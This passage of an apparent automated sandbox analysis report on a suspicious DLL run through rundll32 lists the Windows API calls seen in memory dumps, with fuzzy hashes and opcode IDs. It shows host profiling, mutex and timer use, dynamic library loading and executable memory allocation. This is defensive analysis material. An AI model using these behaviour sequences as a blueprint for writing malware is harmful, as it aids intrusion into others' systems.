                                • Part of subcall function 0593F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                                • Part of subcall function 0593F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                                • Part of subcall function 0593F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                                • Part of subcall function 0593F39B: SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                                • Part of subcall function 0593F39B: CloseHandle.KERNEL32(00001000), ref: 0593F48F
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                              • String ID:
                              • API String ID: 1727939831-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,05945583,00000000,00000000), ref: 05937E46
                              • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 05937ED9
                              • GetLastError.KERNEL32(?,?,0000011F), ref: 05937F31
                              • GetLastError.KERNEL32 ref: 05937F63
                              • GetLastError.KERNEL32 ref: 05937F77
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,05945583,00000000,00000000,?,05933EC6,?), ref: 05937F8C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$memcpy
                              • String ID:
                              • API String ID: 2760375183-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(?,00000020), ref: 0594AEF4
                              • lstrcat.KERNEL32(?,00000020), ref: 0594AF09
                              • lstrcmp.KERNEL32(00000000,?), ref: 0594AF20
                              • lstrlen.KERNEL32(?), ref: 0594AF44
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                              • String ID:
                              • API String ID: 3214092121-3916222277
                              • Opcode ID: 689e6b2750fe25dc5218b31e000b88b6422d65e9a01e025b321337791c024049
                              • Instruction ID: f8ba70263ee869d3a06980bad275d48375d72e86b7fa8a360f10bc8a9ab4b204
                              • Opcode Fuzzy Hash: 689e6b2750fe25dc5218b31e000b88b6422d65e9a01e025b321337791c024049
                              • Instruction Fuzzy Hash: FE516C71A44209EFDB21CF99C485AAEBBBBFF55314F05C49AE8259B201C770AE51CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5A3
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5B4
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5C6
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5D8
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5EA
                              • lstrlenW.KERNEL32(?,05953D54,05F39A2B,00000057), ref: 0593D5F6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen
                              • String ID:
                              • API String ID: 1659193697-0
                              • Opcode ID: 4c2fb9695a9b93a55a9303e6f50994e7e2ce29e08e750b6c8ec299baaf6563b6
                              • Instruction ID: 249bc32f7b10d29e7a6541f08b6b4c20a3581a5bb21bed4cb1ceb5f4e6437820
                              • Opcode Fuzzy Hash: 4c2fb9695a9b93a55a9303e6f50994e7e2ce29e08e750b6c8ec299baaf6563b6
                              • Instruction Fuzzy Hash: 92412171E0070AEFCF10DF99C895A6EB7FAFF98248B148929E556E3204D774E9048B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 059424C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 059424CF
                                • Part of subcall function 059424C3: SetLastError.KERNEL32(000000B7,?,05945C3C,?,?,00000000,?,?,?), ref: 059424E0
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 05945C5C
                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05945D34
                                • Part of subcall function 0593A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0593A990
                                • Part of subcall function 0593A976: CreateWaitableTimerA.KERNEL32(0595A1E8,00000001,?), ref: 0593A9AD
                                • Part of subcall function 0593A976: GetLastError.KERNEL32(?,00000000,05948C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0593A9BE
                                • Part of subcall function 0593A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593A9FE
                                • Part of subcall function 0593A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA1D
                                • Part of subcall function 0593A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA33
                              • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05945D1D
                              • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05945D26
                                • Part of subcall function 059424C3: CreateMutexA.KERNEL32(0595A1E8,00000000,?,?,05945C3C,?,?,00000000,?,?,?), ref: 059424F3
                              • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 05945D41
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                              • String ID:
                              • API String ID: 1700416623-0
                              • Opcode ID: 4749f8f104b667a266362b0eedf3525eb98f95ed3a70780d5af27ac623d3f459
                              • Instruction ID: e8e985b2e34eec0ccfeb1ec218f1740bfdafc6813a6d56e5ef7170a08a90d093
                              • Opcode Fuzzy Hash: 4749f8f104b667a266362b0eedf3525eb98f95ed3a70780d5af27ac623d3f459
                              • Instruction Fuzzy Hash: 51315275614304AFC711AFB4D849D6ABFA9FF89310B264525F916DB250EB359C10CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 0594C228
                                • Part of subcall function 0593A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05937D5E), ref: 0593A6BE
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,059389E4,00000000), ref: 0594C26A
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0594C2BC
                              • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,059389E4,00000000), ref: 0594C2D5
                                • Part of subcall function 0593E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0593EA0D
                                • Part of subcall function 0593E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,0594C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 0593EA50
                              • GetLastError.KERNEL32(?,00000000,059389E4,00000000,?,?,?,?,?,?,?,05939100,?), ref: 0594C30D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                              • String ID:
                              • API String ID: 1921436656-0
                              • Opcode ID: 582e2ba0358a4137eb61be452bcb57bef8583db92343945b8760d805c035b5ec
                              • Instruction ID: d03740836b400edab890f21b19e878edfe27ff6fe62c8f2d6c8785846cb71c50
                              • Opcode Fuzzy Hash: 582e2ba0358a4137eb61be452bcb57bef8583db92343945b8760d805c035b5ec
                              • Instruction Fuzzy Hash: 6731E271A15209EFDF11DFA5D885EAEBBB9EB48650F010066F905A7240EB70AE54CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0593A078
                              • lstrcpy.KERNEL32(00000000,?), ref: 0593A091
                              • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 0593A09E
                              • lstrlen.KERNEL32(0595B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 0593A0B0
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0593A0E1
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                              • String ID:
                              • API String ID: 2734445380-0
                              • Opcode ID: d9a4d559f422bd29e2206b2b29175d514293d6d4951dceb068fcf7c66844d039
                              • Instruction ID: ff096e8a8c97f24edbd3aba7d5a3ba9947caa5b90bab58494899c7fad38555fd
                              • Opcode Fuzzy Hash: d9a4d559f422bd29e2206b2b29175d514293d6d4951dceb068fcf7c66844d039
                              • Instruction Fuzzy Hash: E1316D71500209FFCB11CFA5DC8AEEE7FB9FF45220F104164F91992200EB35A965DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,05933DA2,00000000,00000001,?,?,?), ref: 0593DD92
                              • lstrlen.KERNEL32(?), ref: 0593DDA2
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0593DDD6
                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0593DE01
                              • memcpy.NTDLL(00000000,?,?), ref: 0593DE20
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593DE81
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0593DEA3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Allocatelstrlenmemcpy$Free
                              • String ID:
                              • API String ID: 3204852930-0
                              • Opcode ID: 3205eb25cc2b726aee6814ddfb911ccbe2ba82686b97e8f30d9d13e42068e018
                              • Instruction ID: 4caff6eac0d3c234c45773fee130e6baa4bee9a85984e8967e46b625b1d144bf
                              • Opcode Fuzzy Hash: 3205eb25cc2b726aee6814ddfb911ccbe2ba82686b97e8f30d9d13e42068e018
                              • Instruction Fuzzy Hash: B03119B290420AEFCF11DFA4CC859AE7FB9FF58284F044469E915A7211E731DA648FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 059470C3: RtlEnterCriticalSection.NTDLL(0595A428), ref: 059470CB
                                • Part of subcall function 059470C3: RtlLeaveCriticalSection.NTDLL(0595A428), ref: 059470E0
                                • Part of subcall function 059470C3: InterlockedIncrement.KERNEL32(0000001C), ref: 059470F9
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05941F04
                              • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,05948667,?,00000000), ref: 05941F15
                              • lstrcmpi.KERNEL32(00000002,?), ref: 05941F5B
                              • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,05948667,?,00000000), ref: 05941F6F
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,05948667,?,00000000), ref: 05941FB5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 733514052-0
                              • Opcode ID: 5dfcc3518b36be6bdc59a507e8e02d4e70ed1a660f483c4e5e10c5247163d8b3
                              • Instruction ID: d36b0b31c31e0bfdf2633eefd16fac9d3da0c4e05b63a5876612b89842104300
                              • Opcode Fuzzy Hash: 5dfcc3518b36be6bdc59a507e8e02d4e70ed1a660f483c4e5e10c5247163d8b3
                              • Instruction Fuzzy Hash: 9E31CE32A10309AFCB109FA8DC89EAEBFB9FB44254F100169F90597200EB359DA5DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0593243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0594D58C
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 05932454
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 05932467
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05932478
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 059324E3
                              • InterlockedIncrement.KERNEL32(0595A43C), ref: 059324FA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                              • String ID:
                              • API String ID: 3915436794-0
                              • Opcode ID: bd352b3ebfa755d6c4dc7ad51f6ff4a06f41ed09245a47ea9407dec84999e165
                              • Instruction ID: b4557227704fa0287b9589609bf8277c9b68ef9ef19fa4a7a36951e86675dc4b
                              • Opcode Fuzzy Hash: bd352b3ebfa755d6c4dc7ad51f6ff4a06f41ed09245a47ea9407dec84999e165
                              • Instruction Fuzzy Hash: E0318D35608301DFCB22CF68D84A92ABBF9FB84326B015A19F85683210DB30E921CBD5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0593E23D,00000000,76CDF5B0,05940348,?,00000001), ref: 059386CD
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059386E2
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059386FE
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05938713
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05938727
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad$AddressProc
                              • String ID:
                              • API String ID: 1469910268-0
                              • Opcode ID: 1e383c1dc5b0ad785ff841cb626e4e2f119a1f8a78307105072b5ff0e38c9522
                              • Instruction ID: 218323f02e3c31b53e268e6e60afee644318e453caba1730869316e43a102873
                              • Opcode Fuzzy Hash: 1e383c1dc5b0ad785ff841cb626e4e2f119a1f8a78307105072b5ff0e38c9522
                              • Instruction Fuzzy Hash: 05316B72628311DFD701CF68E582E55BBEAFB49321B854216F60AD7300DB78E822CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 0594833B
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 05948357
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 05948391
                              • GetComputerNameW.KERNEL32(?,?), ref: 059483B4
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 059483D7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                              • String ID:
                              • API String ID: 3850880919-0
                              • Opcode ID: f8e62bd87c7dabebb994a4ac5c8a324586d92610eccf789ea4605c935e17752e
                              • Instruction ID: 2bb7a0c5d6648d605c6766540a333e275867b8e21e81ee6fcfcd998548bacb4f
                              • Opcode Fuzzy Hash: f8e62bd87c7dabebb994a4ac5c8a324586d92610eccf789ea4605c935e17752e
                              • Instruction Fuzzy Hash: 2021D876904209FFDB11DFE8C989DAEBBBCEF44240B5144AAE502E7240DA30AF44DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • DeleteFileA.KERNEL32(00000000,000004D2), ref: 05933090
                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 05933099
                              • GetLastError.KERNEL32 ref: 059330A3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05933162
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 3543646443-0
                              • Opcode ID: efefca33ba9d7b63d1601729b801f9b3659c37ffd01ed37b297e34513506f12d
                              • Instruction ID: 73bf9bbe491ab7a9d95c753558ea4ed9752d0a0c645dfccf7375dd9ced4f73f0
                              • Opcode Fuzzy Hash: efefca33ba9d7b63d1601729b801f9b3659c37ffd01ed37b297e34513506f12d
                              • Instruction Fuzzy Hash: 8F211072625310ABCA10ABF5ED4DE567BACDF8A211B050511B719CB241DB24F9248FE8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05941C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0593E231,00000000,76CDF5B0,05940348,?,00000001), ref: 05941C25
                                • Part of subcall function 05941C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 05941C3B
                                • Part of subcall function 05941C19: _snwprintf.NTDLL ref: 05941C60
                                • Part of subcall function 05941C19: CreateFileMappingW.KERNEL32(000000FF,0595A1E8,00000004,00000000,00001000,?), ref: 05941C7C
                                • Part of subcall function 05941C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05941C8E
                                • Part of subcall function 05941C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 05941CC6
                              • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0593E231,00000000,76CDF5B0,05940348,?,00000001), ref: 05942F89
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05942F92
                              • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0593E231,00000000,76CDF5B0,05940348,?,00000001), ref: 05942FD9
                              • GetLastError.KERNEL32(05943959,00000000,00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05943008
                              • CloseHandle.KERNEL32(00000000,05943959,00000000,00000000,?,?,?,?,?,?,?,05939100,?), ref: 05943018
                                • Part of subcall function 0593C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0593171E,?,?,00000000,?), ref: 0593C2B6
                                • Part of subcall function 0593C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0593171E,?,?,00000000,?), ref: 0593C2DE
                                • Part of subcall function 0593C2AA: memset.NTDLL ref: 0593C2F0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                              • String ID:
                              • API String ID: 1106445334-0
                              • Opcode ID: 66360da6e0bc82c2fe483d7ae7c438f364afc32c268da613c9c6f5eeb7625e69
                              • Instruction ID: a9ccc661db972652c50c2656074875791c35d28179079479002a351b89be401c
                              • Opcode Fuzzy Hash: 66360da6e0bc82c2fe483d7ae7c438f364afc32c268da613c9c6f5eeb7625e69
                              • Instruction Fuzzy Hash: C2219F31628305ABDF11ABB4EC05E5ABBADFF41220B050A68F602D3250EF35ED51DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0593148A,?,?,?), ref: 0594A66F
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,0593148A,?,?,?), ref: 0594A67F
                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,0593148A,?,?,?), ref: 0594A6AB
                              • GetLastError.KERNEL32(?,?,0593148A,?,?,?), ref: 0594A6D0
                              • CloseHandle.KERNEL32(000000FF,?,?,0593148A,?,?,?), ref: 0594A6E1
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastReadSize
                              • String ID:
                              • API String ID: 3577853679-0
                              • Opcode ID: b14e6a54f0fa2336952f93d20ddff677dc33577ce2d5ba912543dc13ed3d6f2c
                              • Instruction ID: 5d5ade108043430a086f324a6345d1fbd9723d20afb2a80e8a49e4722a915030
                              • Opcode Fuzzy Hash: b14e6a54f0fa2336952f93d20ddff677dc33577ce2d5ba912543dc13ed3d6f2c
                              • Instruction Fuzzy Hash: 8011D672154214BFDB205F68DC88EAEBB6EFB443A0F024525F91AA7180D6709D409FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?,00000000,00000001,00000000,?), ref: 059375E9
                              • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?,00000000,00000001,00000000,?), ref: 05937602
                              • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 0593762A
                              • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05937639
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?), ref: 05937670
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Trim$FreeHeap
                              • String ID:
                              • API String ID: 2132463267-0
                              • Opcode ID: 730b3af04f4da1f26efb2df6881a505cd09378bfb434af124fb944f3977507f0
                              • Instruction ID: 2a3d63b31187b089c31ee03c3f77e44ae36a37afde657515b636b15037a4a1df
                              • Opcode Fuzzy Hash: 730b3af04f4da1f26efb2df6881a505cd09378bfb434af124fb944f3977507f0
                              • Instruction Fuzzy Hash: B9115872214305FBD7119BADDC96FAB7FADEB44694F150021BA09D7241EB70DE118790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,005DD5A8,?,?,00000000,00000000,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C), ref: 059438D4
                              • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 05943904
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 05943913
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 05943931
                              • GetLastError.KERNEL32(?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 05943941
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                               Similarity
                               • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 05947436
                              • GetLastError.KERNEL32 ref: 05947459
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0594746C
                              • GetLastError.KERNEL32 ref: 05947477
                              • HeapFree.KERNEL32(00000000,00000000), ref: 059474BF
                               Similarity
                               • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedIncrement.KERNEL32(0595A06C), ref: 05943785
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 059437DC
                              • InterlockedDecrement.KERNEL32(0595A06C), ref: 059437F1
                              • DeleteFileA.KERNEL32(00000000), ref: 0594380F
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594381D
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                                • Part of subcall function 0593A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0593A391
                                • Part of subcall function 0593A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0593A3BD
